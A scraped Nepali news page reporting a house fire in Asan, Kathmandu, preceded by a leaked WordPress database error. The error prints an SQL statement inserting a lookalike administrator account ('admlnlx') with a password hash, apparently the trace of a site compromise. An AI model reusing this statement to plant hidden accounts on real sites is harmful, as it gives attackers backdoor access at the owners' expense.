WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B2sHQ.aWOFBf0Zg9IxH//CRKuTDVNM.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 22:26:20', '', 'admlnlx', 'admlnlx')

असनमा आगलागी, ४ वटा दमकलले आगो निभाउँदै – Gaule Khabar

असनमा आगलागी, ४ वटा दमकलले आगो निभाउँदै

असनमा आगलागी, ४ वटा दमकलले आगो निभाउँदै

गाउँले न्युज, काठमाडौं । काठमाडौंको असनको केलटोलको एउटा घरमा आगलागी भएको छ । शुक्रबार बेलुका साढे ६ बजे घरको चौथो तलाबाट आगो फैलिएको हो ।
काठले बनेको उक्त घरमा ठूलो आगलागी भएको र अरु घरमा पनि फैलिने खतरा बढेकोले आगो निभाउन ४ वटा दमकल पुगेको छ ।

महानगरीय प्रहरी वृत्त जनसेवाका अनुसार काठमाडौं महानगरपालिकाको ३ वटा, ललितपुर महानगरपालिकाको एउटा दमकल र एउटा पानी बोक्ने ट्याङ्करले अहिले आगो निभाइरहेका छन् । आगलागी कसरी सुरु भयो र कति क्षति भयो भन्ने जानकारी आइनसकेको प्रहरीले जनाएको छ ।

 

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका